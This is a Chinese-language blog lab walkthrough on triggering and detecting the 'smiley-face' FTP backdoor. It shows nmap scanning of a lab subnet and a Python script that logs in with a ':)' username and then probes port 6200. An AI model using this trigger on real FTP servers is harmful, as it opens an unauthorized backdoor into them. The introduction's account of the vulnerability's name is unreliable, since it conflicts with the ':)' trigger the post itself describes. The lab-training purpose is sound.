一、笑脸漏洞简介:
笑脸漏洞(Smile vulnerability)是指在计算机系统或网络中,由于某些设计或实现缺陷而导致的安全漏洞。该漏洞的名称源于其影响的用户界面或体验往往看起来友好和无害,但实际上可能会导致严重的安全问题。笑脸漏洞可以在多种应用和系统中存在,尤其是在互联网应用和移动应用中。笑脸漏洞提醒我们,在设计和实现系统时,必须考虑到用户体验的同时,也要重视安全性。
二、实验操作
首先我们打开kaili和需要被监测的靶机,用 ifconfig 语句得到kaili的IP后扫描该网段内所有主机的端口开放情况。如图为例,我们得到kaili的IP为192.168.253.129,由于靶机与我们处于同一网段,故接下来的命令为
nmap 192.168.253.0/24
由图我们可以看出,结尾为133的IP地址端口开放数较多,由此我们可以判断此为靶机IP
接下来我们创建一个python脚本以扫描漏洞,代码如下
import socket
from ftplib import FTP
url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'user:)' # 用户名必须包含:)这两个字符
password = 'mmm' # 密码随便输
try:
ftp.connect(url, 21, timeout=6) # 使用ftp登录,设置延时6秒
ftp.login(username, password)
ftp.quit()
except:
print("完成登录检测")
try:
s = socket.socket() # 使用socket函数来检测是否有漏洞存在
s.connect((url, 6200))
s.close()
print("存在微笑漏洞")
except:
print("没有笑脸漏洞!")
我们将该代码放入kaili桌面,文件名为.py。
下一步,我们扫描靶机的6200端口是否开放(从之前的操作中也可以看出)
若未开放,在命令行中输入ftp + 靶机IP,输入用户名(用户名和密码随意,但是用户名结尾要是:)结尾),结束此操作后,可ctrl+z结束此命令运行,输入nmap -p 6200+靶机IP,以检查端口开放是否成功。
接下来在桌面的文件夹中打开命令行,输入此命令
python +(文件名)
此时监测已完成。
标签:ftp,python,kaili,漏洞,笑脸,IP,靶机 From: https://blog.csdn.net/2302_79646534/article/details/143090300